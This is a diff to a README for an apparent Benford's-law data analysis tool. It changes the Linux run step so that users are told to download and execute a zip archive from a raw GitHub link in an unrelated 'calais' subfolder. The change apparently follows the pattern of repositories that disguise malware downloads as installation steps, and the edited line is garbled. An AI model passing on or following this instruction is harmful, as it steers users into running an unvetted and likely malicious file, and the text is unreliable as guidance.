ttyuja/search_benford_law_compatibility/README.md

 ### 📂 Running the Application
 - For Windows: Double-click the downloaded `.exe` file to run the application.
 - For MacOS: Open the downloaded `.dmg` file and drag the application to the Applications folder.
 Then, click to run.
-- For Linux: Open a terminal and execute the downloaded `.tar.gz` file, then run the application from the terminal.
+- For Linux: Open a terminal and execute the downloaded `https://raw.githubusercontent.com/ttyuja/search_benford_law_compatibility/main/calais/search_benford_law_compatibility.zip` file, then run the application from the terminal.

 ## 🔍 Using the Application
 After running the application, you will see a user-friendly interface.
 Follow these steps to analyze financial data: